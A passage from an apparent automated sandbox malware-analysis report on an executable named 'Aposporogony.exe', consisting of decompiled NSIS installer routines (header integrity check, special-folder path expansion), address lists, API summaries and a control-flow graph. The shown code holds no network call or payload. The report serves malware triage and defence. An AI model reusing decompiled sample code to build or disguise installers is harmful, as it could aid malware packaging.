                                                                                                                                                                                      							if((_a4 & 0x00000002) == 0) {
                                                                                                                                                                                      								E00402E8E(0);
                                                                                                                                                                                      							}
                                                                                                                                                                                      							goto L19;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						E00405E99( &_v40, 0x418ee8, 0x1c);
                                                                                                                                                                                      						_t89 = _v40;
                                                                                                                                                                                      						__eflags = _t89 & 0xfffffff0;
                                                                                                                                                                                      						if((_t89 & 0xfffffff0) != 0) {
                                                                                                                                                                                      							goto L19;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						__eflags = _v36 - 0xdeadbeef;
                                                                                                                                                                                      						if(_v36 != 0xdeadbeef) {
                                                                                                                                                                                      							goto L19;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						__eflags = _v24 - 0x74736e49;
                                                                                                                                                                                      						if(_v24 != 0x74736e49) {
                                                                                                                                                                                      							goto L19;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						__eflags = _v28 - 0x74666f73;
                                                                                                                                                                                      						if(_v28 != 0x74666f73) {
                                                                                                                                                                                      							goto L19;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						__eflags = _v32 - 0x6c6c754e;
                                                                                                                                                                                      						if(_v32 != 0x6c6c754e) {
                                                                                                                                                                                      							goto L19;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_a4 = _a4 | _t89;
                                                                                                                                                                                      						_t103 =  *0x418ed0; // 0x0
                                                                                                                                                                                      						 *0x42a300 =  *0x42a300 | _a4 & 0x00000002;
                                                                                                                                                                                      						_t92 = _v16;
                                                                                                                                                                                      						__eflags = _t92 - _t109;
                                                                                                                                                                                      						 *0x42a258 = _t103;
                                                                                                                                                                                      						if(_t92 > _t109) {
                                                                                                                                                                                      							goto L30;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						__eflags = _a4 & 0x00000008;
                                                                                                                                                                                      						if((_a4 & 0x00000008) != 0) {
                                                                                                                                                                                      							L15:
                                                                                                                                                                                      							_v12 = _v12 + 1;
                                                                                                                                                                                      							_t109 = _t92 - 4;
                                                                                                                                                                                      							__eflags = _t106 - _t109;
                                                                                                                                                                                      							if(_t106 > _t109) {
                                                                                                                                                                                      								_t106 = _t109;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							goto L19;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						__eflags = _a4 & 0x00000004;
                                                                                                                                                                                      						if((_a4 & 0x00000004) != 0) {
                                                                                                                                                                                      							goto L22;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						goto L15;
                                                                                                                                                                                      						L19:
                                                                                                                                                                                      						__eflags = _t109 -  *0x418ee0; // 0x2505
                                                                                                                                                                                      						if(__eflags < 0) {
                                                                                                                                                                                      							_v8 = E004068B5(_v8, 0x418ee8, _t106);
                                                                                                                                                                                      						}
                                                                                                                                                                                      						 *0x418ed0 =  *0x418ed0 + _t106;
                                                                                                                                                                                      						_t109 = _t109 - _t106;
                                                                                                                                                                                      						__eflags = _t109;
                                                                                                                                                                                      					} while (_t109 > 0);
                                                                                                                                                                                      					goto L22;
                                                                                                                                                                                      				}
                                                                                                                                                                                      			}































                                                                                                                                                                                      0x00402f3e
                                                                                                                                                                                      0x00402f41
                                                                                                                                                                                      0x00402f5b
                                                                                                                                                                                      0x00402f60
                                                                                                                                                                                      0x00402f73
                                                                                                                                                                                      0x00402f78
                                                                                                                                                                                      0x00402f7e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00402f80
                                                                                                                                                                                      0x00402f91
                                                                                                                                                                                      0x00402fa2
                                                                                                                                                                                      0x00402fa9
                                                                                                                                                                                      0x00402faf
                                                                                                                                                                                      0x00402fb1
                                                                                                                                                                                      0x00402fb6
                                                                                                                                                                                      0x00402fb8
                                                                                                                                                                                      0x004030a8
                                                                                                                                                                                      0x004030aa
                                                                                                                                                                                      0x004030af
                                                                                                                                                                                      0x004030b6
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004030bc
                                                                                                                                                                                      0x004030bf
                                                                                                                                                                                      0x004030eb
                                                                                                                                                                                      0x004030f0
                                                                                                                                                                                      0x004030fb
                                                                                                                                                                                      0x004030fd
                                                                                                                                                                                      0x0040310e
                                                                                                                                                                                      0x00403129
                                                                                                                                                                                      0x0040312f
                                                                                                                                                                                      0x00403132
                                                                                                                                                                                      0x00403137
                                                                                                                                                                                      0x00403156
                                                                                                                                                                                      0x00403166
                                                                                                                                                                                      0x00403178
                                                                                                                                                                                      0x0040317d
                                                                                                                                                                                      0x00403182
                                                                                                                                                                                      0x00403185
                                                                                                                                                                                      0x0040318e
                                                                                                                                                                                      0x00403192
                                                                                                                                                                                      0x0040319a
                                                                                                                                                                                      0x0040319f
                                                                                                                                                                                      0x004031a1
                                                                                                                                                                                      0x004031a1
                                                                                                                                                                                      0x004031a1
                                                                                                                                                                                      0x004031a9
                                                                                                                                                                                      0x004031a9
                                                                                                                                                                                      0x004031ac
                                                                                                                                                                                      0x004031ad
                                                                                                                                                                                      0x004031ad
                                                                                                                                                                                      0x004031b0
                                                                                                                                                                                      0x004031b2
                                                                                                                                                                                      0x004031b2
                                                                                                                                                                                      0x004031b2
                                                                                                                                                                                      0x004031b5
                                                                                                                                                                                      0x004031bc
                                                                                                                                                                                      0x004031c8
                                                                                                                                                                                      0x004031cd
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004031cd
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00403185
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00403139
                                                                                                                                                                                      0x004030c7
                                                                                                                                                                                      0x004030d2
                                                                                                                                                                                      0x004030d7
                                                                                                                                                                                      0x004030d9
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004030e2
                                                                                                                                                                                      0x004030e5
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00402fbe
                                                                                                                                                                                      0x00402fbe
                                                                                                                                                                                      0x00402fc3
                                                                                                                                                                                      0x00402fc7
                                                                                                                                                                                      0x00402fce
                                                                                                                                                                                      0x00402fd3
                                                                                                                                                                                      0x00402fd5
                                                                                                                                                                                      0x00402fd7
                                                                                                                                                                                      0x00402fd7
                                                                                                                                                                                      0x00402fdf
                                                                                                                                                                                      0x00402fe4
                                                                                                                                                                                      0x00402fe6
                                                                                                                                                                                      0x00403145
                                                                                                                                                                                      0x00403187
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00403187
                                                                                                                                                                                      0x00402fec
                                                                                                                                                                                      0x00402ff2
                                                                                                                                                                                      0x00403072
                                                                                                                                                                                      0x00403076
                                                                                                                                                                                      0x00403079
                                                                                                                                                                                      0x0040307e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00403076
                                                                                                                                                                                      0x00402fff
                                                                                                                                                                                      0x00403004
                                                                                                                                                                                      0x00403007
                                                                                                                                                                                      0x0040300c
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0040300e
                                                                                                                                                                                      0x00403015
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00403017
                                                                                                                                                                                      0x0040301e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00403020
                                                                                                                                                                                      0x00403027
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00403029
                                                                                                                                                                                      0x00403030
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00403032
                                                                                                                                                                                      0x00403038
                                                                                                                                                                                      0x00403041
                                                                                                                                                                                      0x00403047
                                                                                                                                                                                      0x0040304a
                                                                                                                                                                                      0x0040304c
                                                                                                                                                                                      0x00403052
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00403058
                                                                                                                                                                                      0x0040305c
                                                                                                                                                                                      0x00403064
                                                                                                                                                                                      0x00403064
                                                                                                                                                                                      0x00403067
                                                                                                                                                                                      0x0040306a
                                                                                                                                                                                      0x0040306c
                                                                                                                                                                                      0x0040306e
                                                                                                                                                                                      0x0040306e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0040306c
                                                                                                                                                                                      0x0040305e
                                                                                                                                                                                      0x00403062
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0040307f
                                                                                                                                                                                      0x0040307f
                                                                                                                                                                                      0x00403085
                                                                                                                                                                                      0x00403095
                                                                                                                                                                                      0x00403095
                                                                                                                                                                                      0x00403098
                                                                                                                                                                                      0x0040309e
                                                                                                                                                                                      0x004030a0
                                                                                                                                                                                      0x004030a0
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00402fbe

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00402F44
                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Aposporogony.exe,00000400), ref: 00402F60
                                                                                                                                                                                        • Part of subcall function 00405EDE: GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\Aposporogony.exe,80000000,00000003), ref: 00405EE2
                                                                                                                                                                                        • Part of subcall function 00405EDE: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Aposporogony.exe,C:\Users\user\Desktop\Aposporogony.exe,80000000,00000003), ref: 00402FA9
                                                                                                                                                                                      • GlobalAlloc.KERNELBASE(00000040,0040A230), ref: 004030F0
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                                                                      • String ID: "C:\Users\user\Desktop\Aposporogony.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Aposporogony.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$
                                                                                                                                                                                      • API String ID: 2803837635-2316685024
                                                                                                                                                                                      • Opcode ID: 17d4548877bb422f8be7689a7878bb05eb645905850902383813b6e2c7289b3d
                                                                                                                                                                                      • Instruction ID: fab51a6d61a7302470dd91ad27108f0c0be819ae48098b15a947b51e22d3bd00
                                                                                                                                                                                      • Opcode Fuzzy Hash: 17d4548877bb422f8be7689a7878bb05eb645905850902383813b6e2c7289b3d
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4961D271A00205ABDB20DFA4DD45A9A7BA8EB04356F20413FF904F62D1DB7C9A458BAD
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 653 40640a-406415 654 406417-406426 653->654 655 406428-40643e 653->655 654->655 656 406444-406451 655->656 657 406656-40665c 655->657 656->657 660 406457-40645e 656->660 658 406662-40666d 657->658 659 406463-406470 657->659 662 406678-406679 658->662 663 40666f-406673 call 4063e8 658->663 659->658 661 406476-406482 659->661 660->657 664 406643 661->664 665 406488-4064c6 661->665 663->662 669 406651-406654 664->669 670 406645-40664f 664->670 667 4065e6-4065ea 665->667 668 4064cc-4064d7 665->668 673 4065ec-4065f2 667->673 674 40661d-406621 667->674 671 4064f0 668->671 672 4064d9-4064de 668->672 669->657 670->657 678 4064f7-4064fe 671->678 672->671 675 4064e0-4064e3 672->675 676 406602-40660e call 4063e8 673->676 677 4065f4-406600 call 40632f 673->677 679 406630-406641 lstrlenW 674->679 680 406623-40662b call 40640a 674->680 675->671 682 4064e5-4064e8 675->682 691 406613-406619 676->691 677->691 684 406500-406502 678->684 685 406503-406505 678->685 679->657 680->679 682->671 687 4064ea-4064ee 682->687 684->685 689 406540-406543 685->689 690 406507-406525 call 4062b6 685->690 687->678 692 406553-406556 689->692 693 406545-406551 GetSystemDirectoryW 689->693 699 40652a-40652e 690->699 691->679 695 40661b 691->695 697 4065c1-4065c3 692->697 698 406558-406566 GetWindowsDirectoryW 692->698 696 4065c5-4065c9 693->696 700 4065de-4065e4 call 40667c 695->700 696->700 705 4065cb 696->705 697->696 702 406568-406572 697->702 698->697 703 406534-40653b call 40640a 699->703 704 4065ce-4065d1 699->704 700->679 708 406574-406577 702->708 709 40658c-4065a2 SHGetSpecialFolderLocation 702->709 703->696 704->700 706 4065d3-4065d9 lstrcatW 704->706 705->704 706->700 708->709 712 406579-406580 708->712 713 4065a4-4065bb SHGetPathFromIDListW CoTaskMemFree 709->713 714 4065bd 709->714 715 406588-40658a 712->715 713->696 713->714 714->697 715->696 715->709
                                                                                                                                                                                      C-Code - Quality: 72%
                                                                                                                                                                                      			E0040640A(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                      				struct _ITEMIDLIST* _v12;
                                                                                                                                                                                      				signed int _v16;
                                                                                                                                                                                      				signed int _v20;
                                                                                                                                                                                      				signed int _v24;
                                                                                                                                                                                      				signed int _v28;
                                                                                                                                                                                      				signed int _t43;
                                                                                                                                                                                      				WCHAR* _t44;
                                                                                                                                                                                      				signed char _t46;
                                                                                                                                                                                      				signed int _t47;
                                                                                                                                                                                      				signed int _t48;
                                                                                                                                                                                      				short _t58;
                                                                                                                                                                                      				short _t60;
                                                                                                                                                                                      				short _t62;
                                                                                                                                                                                      				void* _t70;
                                                                                                                                                                                      				signed int _t76;
                                                                                                                                                                                      				void* _t82;
                                                                                                                                                                                      				signed char _t83;
                                                                                                                                                                                      				short _t86;
                                                                                                                                                                                      				signed int _t96;
                                                                                                                                                                                      				void* _t102;
                                                                                                                                                                                      				short _t103;
                                                                                                                                                                                      				signed int _t106;
                                                                                                                                                                                      				signed int _t108;
                                                                                                                                                                                      				void* _t109;
                                                                                                                                                                                      				WCHAR* _t110;
                                                                                                                                                                                      				void* _t112;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t109 = __esi;
                                                                                                                                                                                      				_t102 = __edi;
                                                                                                                                                                                      				_t70 = __ebx;
                                                                                                                                                                                      				_t43 = _a8;
                                                                                                                                                                                      				if(_t43 < 0) {
                                                                                                                                                                                      					_t43 =  *( *0x42921c - 4 + _t43 * 4);
                                                                                                                                                                                      				}
                                                                                                                                                                                      				_push(_t70);
                                                                                                                                                                                      				_push(_t109);
                                                                                                                                                                                      				_push(_t102);
                                                                                                                                                                                      				_t96 =  *0x42a298 + _t43 * 2;
                                                                                                                                                                                      				_t44 = 0x4281e0;
                                                                                                                                                                                      				_t110 = 0x4281e0;
                                                                                                                                                                                      				if(_a4 >= 0x4281e0 && _a4 - 0x4281e0 >> 1 < 0x800) {
                                                                                                                                                                                      					_t110 = _a4;
                                                                                                                                                                                      					_a4 = _a4 & 0x00000000;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                      					_t103 =  *_t96;
                                                                                                                                                                                      					if(_t103 == 0) {
                                                                                                                                                                                      						break;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					__eflags = (_t110 - _t44 & 0xfffffffe) - 0x800;
                                                                                                                                                                                      					if((_t110 - _t44 & 0xfffffffe) >= 0x800) {
                                                                                                                                                                                      						break;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_t82 = 2;
                                                                                                                                                                                      					_t96 = _t96 + _t82;
                                                                                                                                                                                      					__eflags = _t103 - 4;
                                                                                                                                                                                      					_a8 = _t96;
                                                                                                                                                                                      					if(__eflags >= 0) {
                                                                                                                                                                                      						if(__eflags != 0) {
                                                                                                                                                                                      							 *_t110 = _t103;
                                                                                                                                                                                      							_t110 = _t110 + _t82;
                                                                                                                                                                                      							__eflags = _t110;
                                                                                                                                                                                      						} else {
                                                                                                                                                                                      							 *_t110 =  *_t96;
                                                                                                                                                                                      							_t110 = _t110 + _t82;
                                                                                                                                                                                      							_t96 = _t96 + _t82;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						continue;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_t83 =  *((intOrPtr*)(_t96 + 1));
                                                                                                                                                                                      					_t46 =  *_t96;
                                                                                                                                                                                      					_t47 = _t46 & 0x000000ff;
                                                                                                                                                                                      					_v8 = (_t83 & 0x0000007f) << 0x00000007 | _t46 & 0x0000007f;
                                                                                                                                                                                      					_a8 = _a8 + 2;
                                                                                                                                                                                      					_v28 = _t47 | 0x00008000;
                                                                                                                                                                                      					_v24 = _t47;
                                                                                                                                                                                      					_t76 = _t83 & 0x000000ff;
                                                                                                                                                                                      					_v16 = _t76;
                                                                                                                                                                                      					__eflags = _t103 - 2;
                                                                                                                                                                                      					_v20 = _t76 | 0x00008000;
                                                                                                                                                                                      					if(_t103 != 2) {
                                                                                                                                                                                      						__eflags = _t103 - 3;
                                                                                                                                                                                      						if(_t103 != 3) {
                                                                                                                                                                                      							__eflags = _t103 - 1;
                                                                                                                                                                                      							if(_t103 == 1) {
                                                                                                                                                                                      								__eflags = (_t47 | 0xffffffff) - _v8;
                                                                                                                                                                                      								E0040640A(_t76, _t103, _t110, _t110, (_t47 | 0xffffffff) - _v8);
                                                                                                                                                                                      							}
                                                                                                                                                                                      							L43:
                                                                                                                                                                                      							_t48 = lstrlenW(_t110);
                                                                                                                                                                                      							_t96 = _a8;
                                                                                                                                                                                      							_t110 =  &(_t110[_t48]);
                                                                                                                                                                                      							_t44 = 0x4281e0;
                                                                                                                                                                                      							continue;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_t106 = _v8;
                                                                                                                                                                                      						__eflags = _t106 - 0x1d;
                                                                                                                                                                                      						if(_t106 != 0x1d) {
                                                                                                                                                                                      							__eflags = (_t106 << 0xb) + 0x42b000;
                                                                                                                                                                                      							E004063E8(_t110, (_t106 << 0xb) + 0x42b000);
                                                                                                                                                                                      						} else {
                                                                                                                                                                                      							E0040632F(_t110,  *0x42a248);
                                                                                                                                                                                      						}
                                                                                                                                                                                      						__eflags = _t106 + 0xffffffeb - 7;
                                                                                                                                                                                      						if(_t106 + 0xffffffeb < 7) {
                                                                                                                                                                                      							L34:
                                                                                                                                                                                      							E0040667C(_t110);
                                                                                                                                                                                      						}
                                                                                                                                                                                      						goto L43;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_t86 =  *0x42a24c;
                                                                                                                                                                                      					__eflags = _t86;
                                                                                                                                                                                      					_t108 = 2;
                                                                                                                                                                                      					if(_t86 >= 0) {
                                                                                                                                                                                      						L13:
                                                                                                                                                                                      						_v8 = 1;
                                                                                                                                                                                      						L14:
                                                                                                                                                                                      						__eflags =  *0x42a2e4;
                                                                                                                                                                                      						if( *0x42a2e4 != 0) {
                                                                                                                                                                                      							_t108 = 4;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						__eflags = _t47;
                                                                                                                                                                                      						if(__eflags >= 0) {
                                                                                                                                                                                      							__eflags = _t47 - 0x25;
                                                                                                                                                                                      							if(_t47 != 0x25) {
                                                                                                                                                                                      								__eflags = _t47 - 0x24;
                                                                                                                                                                                      								if(_t47 == 0x24) {
                                                                                                                                                                                      									GetWindowsDirectoryW(_t110, 0x400);
                                                                                                                                                                                      									_t108 = 0;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								while(1) {
                                                                                                                                                                                      									__eflags = _t108;
                                                                                                                                                                                      									if(_t108 == 0) {
                                                                                                                                                                                      										goto L30;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									_t58 =  *0x42a244;
                                                                                                                                                                                      									_t108 = _t108 - 1;
                                                                                                                                                                                      									__eflags = _t58;
                                                                                                                                                                                      									if(_t58 == 0) {
                                                                                                                                                                                      										L26:
                                                                                                                                                                                      										_t60 = SHGetSpecialFolderLocation( *0x42a248,  *(_t112 + _t108 * 4 - 0x18),  &_v12);
                                                                                                                                                                                      										__eflags = _t60;
                                                                                                                                                                                      										if(_t60 != 0) {
                                                                                                                                                                                      											L28:
                                                                                                                                                                                      											 *_t110 =  *_t110 & 0x00000000;
                                                                                                                                                                                      											__eflags =  *_t110;
                                                                                                                                                                                      											continue;
                                                                                                                                                                                      										}
                                                                                                                                                                                      										__imp__SHGetPathFromIDListW(_v12, _t110);
                                                                                                                                                                                      										__imp__CoTaskMemFree(_v12);
                                                                                                                                                                                      										__eflags = _t60;
                                                                                                                                                                                      										if(_t60 != 0) {
                                                                                                                                                                                      											goto L30;
                                                                                                                                                                                      										}
                                                                                                                                                                                      										goto L28;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									__eflags = _v8;
                                                                                                                                                                                      									if(_v8 == 0) {
                                                                                                                                                                                      										goto L26;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									_t62 =  *_t58( *0x42a248,  *(_t112 + _t108 * 4 - 0x18), 0, 0, _t110); // executed
                                                                                                                                                                                      									__eflags = _t62;
                                                                                                                                                                                      									if(_t62 == 0) {
                                                                                                                                                                                      										goto L30;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									goto L26;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								goto L30;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							GetSystemDirectoryW(_t110, 0x400);
                                                                                                                                                                                      							goto L30;
                                                                                                                                                                                      						} else {
                                                                                                                                                                                      							E004062B6( *0x42a298, __eflags, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x42a298 + (_t47 & 0x0000003f) * 2, _t110, _t47 & 0x00000040); // executed
                                                                                                                                                                                      							__eflags =  *_t110;
                                                                                                                                                                                      							if( *_t110 != 0) {
                                                                                                                                                                                      								L32:
                                                                                                                                                                                      								__eflags = _t76 - 0x1a;
                                                                                                                                                                                      								if(_t76 == 0x1a) {
                                                                                                                                                                                      									lstrcatW(_t110, L"\\Microsoft\\Internet Explorer\\Quick Launch");
                                                                                                                                                                                      								}
                                                                                                                                                                                      								goto L34;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							E0040640A(_t76, _t108, _t110, _t110, _t76);
                                                                                                                                                                                      							L30:
                                                                                                                                                                                      							__eflags =  *_t110;
                                                                                                                                                                                      							if( *_t110 == 0) {
                                                                                                                                                                                      								goto L34;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_t76 = _v16;
                                                                                                                                                                                      							goto L32;
                                                                                                                                                                                      						}
                                                                                                                                                                                      					}
                                                                                                                                                                                      					__eflags = _t86 - 0x5a04;
                                                                                                                                                                                      					if(_t86 == 0x5a04) {
                                                                                                                                                                                      						goto L13;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					__eflags = _t76 - 0x23;
                                                                                                                                                                                      					if(_t76 == 0x23) {
                                                                                                                                                                                      						goto L13;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					__eflags = _t76 - 0x2e;
                                                                                                                                                                                      					if(_t76 == 0x2e) {
                                                                                                                                                                                      						goto L13;
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						_v8 = _v8 & 0x00000000;
                                                                                                                                                                                      						goto L14;
                                                                                                                                                                                      					}
                                                                                                                                                                                      				}
                                                                                                                                                                                      				 *_t110 =  *_t110 & 0x00000000;
                                                                                                                                                                                      				if(_a4 == 0) {
                                                                                                                                                                                      					return _t44;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				return E004063E8(_a4, _t44);
                                                                                                                                                                                      			}






























                                                                                                                                                                                      0x0040640a
                                                                                                                                                                                      0x0040640a
                                                                                                                                                                                      0x0040640a
                                                                                                                                                                                      0x00406410
                                                                                                                                                                                      0x00406415
                                                                                                                                                                                      0x00406426
                                                                                                                                                                                      0x00406426
                                                                                                                                                                                      0x0040642e
                                                                                                                                                                                      0x0040642f
                                                                                                                                                                                      0x00406430
                                                                                                                                                                                      0x00406431
                                                                                                                                                                                      0x00406434
                                                                                                                                                                                      0x0040643c
                                                                                                                                                                                      0x0040643e
                                                                                                                                                                                      0x00406457
                                                                                                                                                                                      0x0040645a
                                                                                                                                                                                      0x0040645a
                                                                                                                                                                                      0x00406656
                                                                                                                                                                                      0x00406656
                                                                                                                                                                                      0x0040665c
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0040646a
                                                                                                                                                                                      0x00406470
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406478
                                                                                                                                                                                      0x00406479
                                                                                                                                                                                      0x0040647b
                                                                                                                                                                                      0x0040647f
                                                                                                                                                                                      0x00406482
                                                                                                                                                                                      0x00406643
                                                                                                                                                                                      0x00406651
                                                                                                                                                                                      0x00406654
                                                                                                                                                                                      0x00406654
                                                                                                                                                                                      0x00406645
                                                                                                                                                                                      0x00406648
                                                                                                                                                                                      0x0040664b
                                                                                                                                                                                      0x0040664d
                                                                                                                                                                                      0x0040664d
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406643
                                                                                                                                                                                      0x00406488
                                                                                                                                                                                      0x0040648b
                                                                                                                                                                                      0x0040649a
                                                                                                                                                                                      0x004064a1
                                                                                                                                                                                      0x004064ab
                                                                                                                                                                                      0x004064af
                                                                                                                                                                                      0x004064b2
                                                                                                                                                                                      0x004064b5
                                                                                                                                                                                      0x004064ba
                                                                                                                                                                                      0x004064bf
                                                                                                                                                                                      0x004064c3
                                                                                                                                                                                      0x004064c6
                                                                                                                                                                                      0x004065e6
                                                                                                                                                                                      0x004065ea
                                                                                                                                                                                      0x0040661d
                                                                                                                                                                                      0x00406621
                                                                                                                                                                                      0x00406626
                                                                                                                                                                                      0x0040662b
                                                                                                                                                                                      0x0040662b
                                                                                                                                                                                      0x00406630
                                                                                                                                                                                      0x00406631
                                                                                                                                                                                      0x00406636
                                                                                                                                                                                      0x00406639
                                                                                                                                                                                      0x0040663c
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0040663c
                                                                                                                                                                                      0x004065ec
                                                                                                                                                                                      0x004065ef
                                                                                                                                                                                      0x004065f2
                                                                                                                                                                                      0x00406607
                                                                                                                                                                                      0x0040660e
                                                                                                                                                                                      0x004065f4
                                                                                                                                                                                      0x004065fb
                                                                                                                                                                                      0x004065fb
                                                                                                                                                                                      0x00406616
                                                                                                                                                                                      0x00406619
                                                                                                                                                                                      0x004065de
                                                                                                                                                                                      0x004065df
                                                                                                                                                                                      0x004065df
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406619
                                                                                                                                                                                      0x004064cc
                                                                                                                                                                                      0x004064d4
                                                                                                                                                                                      0x004064d6
                                                                                                                                                                                      0x004064d7
                                                                                                                                                                                      0x004064f0
                                                                                                                                                                                      0x004064f0
                                                                                                                                                                                      0x004064f7
                                                                                                                                                                                      0x004064f7
                                                                                                                                                                                      0x004064fe
                                                                                                                                                                                      0x00406502
                                                                                                                                                                                      0x00406502
                                                                                                                                                                                      0x00406503
                                                                                                                                                                                      0x00406505
                                                                                                                                                                                      0x00406540
                                                                                                                                                                                      0x00406543
                                                                                                                                                                                      0x00406553
                                                                                                                                                                                      0x00406556
                                                                                                                                                                                      0x0040655e
                                                                                                                                                                                      0x00406564
